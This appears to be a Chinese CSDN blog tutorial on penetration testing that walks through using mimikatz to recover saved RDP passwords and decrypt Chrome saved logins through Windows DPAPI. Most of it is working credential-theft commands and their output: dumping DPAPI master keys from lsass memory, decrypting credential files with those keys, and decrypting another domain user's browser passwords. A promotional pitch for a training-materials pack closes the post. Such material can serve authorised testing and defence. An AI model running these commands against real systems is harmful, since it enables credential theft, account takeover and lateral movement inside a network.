利用mimikatz查看rdp连接密码【渗透测试】_mimikatz pth rdp

目标: Domain:target=TERMSRV/192.168.100.52
类型: 域密码
用户: admin
本地机器持续时间

目标: LegacyGeneric:target=Adobe User Info(Part2)
类型: 普通 
用户: User DT
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/172.16.1.246
类型: 普通 
用户: administrator
本地机器持续时间

目标: Domain:target=TERMSRV/192.168.100.42
类型: 域密码
用户: admin
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.53
类型: 普通 
用户: lmrsec\tony
本地机器持续时间

目标: LegacyGeneric:target=Adobe User Info(Part1)
类型: 普通 
用户: User DT
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/192.168.100.45
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=Adobe User OS Info(Part1)
类型: 普通 
用户: User OS Info
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/172.16.1.134
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/192.168.100.46
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.54
类型: 普通 
用户: LMRSEC\lmr
本地机器持续时间    

目标: LegacyGeneric:target=TERMSRV/172.16.1.124
类型: 普通 
用户: administrator
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.20.123
类型: 普通 
用户: pc
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.100
类型: 普通 
用户: lmrsec\tony
本地机器持续时间

目标: LegacyGeneric:target=TERMSRV/10.10.40.55
类型: 普通 
用户: LMRSEC\tony
本地机器持续时间        

目标: LegacyGeneric:target=TERMSRV/10.10.40.62
类型: 普通 
用户: MEC0\administrator
本地机器持续时间        

目标: Domain:target=192.168.1.94
类型: 域密码
用户: LEE-PC\admin

目标: Domain:target=10.0.0.152
类型: 域密码
用户: LEE-PC\administrator    

目标: LegacyGeneric:target=chia-user-chia-1.8
类型: 普通 
用户: wallet-user-chia-1.8-0    

目标: Domain:target=PIG
类型: 域密码
用户: LEE-PC\admin


使用命令:dir /a %userprofile%\AppData\Local\Microsoft\Credentials 来查看保存凭据的目录和凭据的值


![](https://img-blog.csdnimg.cn/aa6e78472c574299bba5f40ef7d5dacf.png)


接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。


例如:



mimikatz “dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D” exit >a.txt



mimikatz(commandline) # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
BLOB
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {fe6b8194-8763-4328-a189-23815ffc11bc}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000012 - 18
szDescription : 本地凭据数据

algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 67ac51d78138d3bb51ed1c07b1bc17a7
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 8f18a25d233beb6c1fb8985285fc14d7
dwDataLen : 00002a10 - 10768
pbData : f8499588628921158b20b343b3f887ece87192f1a6f0d00fd223f1b001fa55c6feeb…


记住 guidMasterKey   {fe6b8194-8763-4328-a189-23815ffc11bc}



mimikatz “privilege::debug” “sekurlsa::dpapi full” exit>b.txt


在b.txt中找 {fe6b8194-8763-4328-a189-23815ffc11bc} 对应的MasterKey



Authentication Id : 0 ; 568702 (00000000:0008ad7e)
Session : Interactive from 1
User Name : administrator
Domain : LMRSEC
Logon Server : AD
Logon Time : 2022/9/22 14:14:42
SID : S-1-5-21-4175578073-168413485-1140492047-500
[00000000]
* GUID : {ef3e71aa-6279-4999-9c2d-cbb67f71eb3f}
* Time : 2022/9/22 14:16:03
* MasterKey : 6a58ad5cfa0d10fb3fd8ea9647eace29481338b7bc23c6d485780be9a136276840e601be86c6d84586948f93d83bf4bc7c2063a51f74b91afd1c2b3eb1d28cf6
* sha1(key) : e500f8e3977bac36b4eb56ebea93d222bd1e748c
[00000001]
* GUID : {fe6b8194-8763-4328-a189-23815ffc11bc}
* Time : 2022/9/22 14:15:05
* MasterKey : 57571066d0752738bebc51550a89ac801db0729abd0aa61f0945262e6b4d279445b08e2023ea1a2b1d357594f7838d02b76250a456f9d9e59af4b3ba659352c0
* sha1(key) : eb92f311be6e846c0ae0241a332dd28415048e0a
[00000002]
* GUID : {17a3b3a5-41f6-4809-adb4-20f255db4e2b}
* Time : 2022/9/22 14:16:51
* MasterKey : eacdf11ecd0a819bc619e378292a873d994313be95d8aa9bab5924df98f389d93274c2fc9f532afcfc0dca7b19e1d70aca65887a2e26ac1983f45dd555345825
* sha1(key) : 7c09ddedde899693c19e66b1e8b918beb42bb15f



mimikatz 读取密码:

mimikatz “dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:57571066d0752738bebc51550a89ac801db0729abd0aa61f0945262e6b4d279445b08e2023ea1a2b1d357594f7838d02b76250a456f9d9e59af4b3ba659352c0” exit>c.txt


UserName就是账户,CredentialBlob  字段值是解密后的密码,如果是空,就尝试 Credentials  目录下其他凭据的值。(毕竟渗透也是个苦力活...)



Decrypting Credential:

  • masterkey : 57571066d0752738bebc51550a89ac801db0729abd0aa61f0945262e6b4d279445b08e2023ea1a2b1d357594f7838d02b76250a456f9d9e59af4b3ba659352c0
    CREDENTIAL
    credFlags : 00000030 - 48
    credSize : 00002a0e - 10766
    credUnk0 : 00000000 - 0

Type : 00000001 - 1 - generic
Flags : 00000000 - 0
LastWritten : 2022/7/10 13:00:32
unkFlagsOrSize : 00000000 - 0
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000020 - 32
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : WindowsLive:target=virtualapp/didlogical
UnkData : (null)
Comment : PersistedCredential
TargetAlias : (null)
UserName : 02qfntekitrt
CredentialBlob :
Attributes : 32
ATTRIBUTE
Flags : 00000000 - 0
Keyword : Microsoft_WindowsLive:authstate:0
Value : 01 00 00 00 d0 8c 9d df 01 15 d1 11 8c…


**实际渗透中可以将 Credentials目录和 lsass.exe 的内存文件保存到本地。**


我一般会优先破解近期访问的连接。 例如,2022/09/22 13:41 这个近期的连接,我们尝试破解一下:


![](https://img-blog.csdnimg.cn/aa6e78472c574299bba5f40ef7d5dacf.png)



mimikatz “dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\BDB00E0494A9448757D06512E460C336” exit|findstr guidMasterKey" exit


![](https://img-blog.csdnimg.cn/d5ab7cca86064ee5b034371dfe4314f1.png)


 从刚刚导出的  sekurlsa::dpapi 查找 GUID 对应的 MasterKey:


![](https://img-blog.csdnimg.cn/171638b77cf54f6a8ec4fd2b89b50914.png)



mimikatz “dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\BDB00E0494A9448757D06512E460C336 /masterkey:5823ca8c268bb7b96a52c3cf21e3d47c453be443e1ed8acbeee4813785c030f9bb765447c6c4e8e735726871c57b5d361bcfa1507cedc0a11850995ab199843a” exit


 ![](https://img-blog.csdnimg.cn/965c1baafef24bf9be7ac421bb0b6275.png)


进一步的,想知道windows保存了哪些凭据,那些没保存,使用命令:



reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /s


 如果没保存密码,结果如下:


![](https://img-blog.csdnimg.cn/a098f91890744376a1023fbb866ad0a1.png)


如果保存了,如下:


![](https://img-blog.csdnimg.cn/0f1093967e5c49d89cf1922a5b37b5e6.png)


[导出windows密码技巧总结\_渗透测试中心的博客-CSDN博客](https://bbs.csdn.net/topics/618653875)  
  


#### 0x03 破解浏览器凭据


其他凭据,如web浏览器凭据:


dir /a "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login Data"


![](https://img-blog.csdnimg.cn/95f6091e0dcd455baa75dd575379344b.png)


 都是用 dpapi 加密的。


解密本地浏览器凭据:



mimikatz "dpapi::chrome /in:“C:\Users\lmr\AppData\Local\Google\Chrome\User Data\Default\Login Data” /unprotect



![](https://img-blog.csdnimg.cn/5551ff10b4d641a5b9be98154f143ff6.png)


chrome 80以前是直接可以通过dpapi去解密的,80以后变成AES了,所以需要指定一下/encryptedkey参数,这个参数内容是在Chrome/User Data/Local State这个文件里,这是个json文件,搜里面的encrypted\_key,这个参数就是加密的密钥,指定之后就可以成功解密保存的密码了



mimikatz “dpapi::chrome /in:“C:\Users\lmr\AppData\Local\Google\Chrome\User Data\Default\Login Data” /unprotect /encryptedkey:RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAcNoSWcBg/SJyGPdAHkODAAAAAAAIAAAAAAANmAADAAAAAEAAAAA7YX8gUf3+tiMFkL6W6I1gAAAAABIAAAKAAAAAQAAAALPfk2cUfKSaXWrBO+q1sTSgAAACTT3f5PFH6LsG0F+KFyPyYjzVwPar8ePO2I/Tgi3/SVNyx+XxlXi8eFAAAAC6DyST9L+EPyq4tGdXLOARW0dvW” exit


![](https://img-blog.csdnimg.cn/175799d8a2ad4bbf941df595ae05b827.png)


 如果你不满足于只接触当前lmr用户的浏览器凭据,也想**拿域内其他机器的浏览器凭据**,那么要满足几个条件:**管理员权限,拿到2个文件 Local State + Login Data + masterkey**


例如lmr用户想crack tony用户的浏览器凭据,需要拿到tony用户下的 Local State 和 Login Data 文件,分别在 "%localappdata%\Google\Chrome\User Data\Local State" 和 "%localappdata%\Google\Chrome\User Data\Default\Login Data"目录。


具体操作如下:



mimikatz “dpapi::chrome /in:“C:\Users\tony\AppData\Local\Google\Chrome\User Data\Default\Login Data” /unprotect /encryptedkey:RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC7lwjlTgo8QYn9FA3Kr2gUAAAAAAIAAAAAAANmAADAAAAAEAAAAJwtvYN1SduvSThcd3jUU0cAAAAABIAAAKAAAAAQAAAAPaGDdYmChJdd5jkm9jGWWygAAAAdSUuaJEX85zORzq8BP8RM4sePvSFV6MRGokcE0hJwlMioFLmziL+BFAAAAICv4ae9Ic5C3tzsAMyc5ntLd/l+” exit


![](https://img-blog.csdnimg.cn/849aa869999a43f7b511d023b8fbd4f0.jpeg)



 会提示去GUID找masterkey,GUID的生成导出上文已经介绍过了,具体命令是:



mimikatz “privilege::debug” “sekurlsa::dpapi full” exit>b.txt

## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/a0f2c0e920e37e6a8734e3ad80f2fd97.png)

![img](https://img-blog.csdnimg.cn/img_convert/75b2cc8c0adc9a9eda2e1e4192fcb638.png)

![img](https://img-blog.csdnimg.cn/img_convert/f17ee9a115110e8291c3ce88c5619dbb.png)

![img](https://img-blog.csdnimg.cn/img_convert/bca369ca408a6085cac97daa053abf47.png)

![img](https://img-blog.csdnimg.cn/img_convert/cd5e0235f48c60dc9e93e7642e07e207.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

[外链图片转存中...(img-iJjPHIbc-1715631478214)]

[外链图片转存中...(img-DGnG2DKG-1715631478214)]

[外链图片转存中...(img-BHtch0lt-1715631478215)]

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

  • 25
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值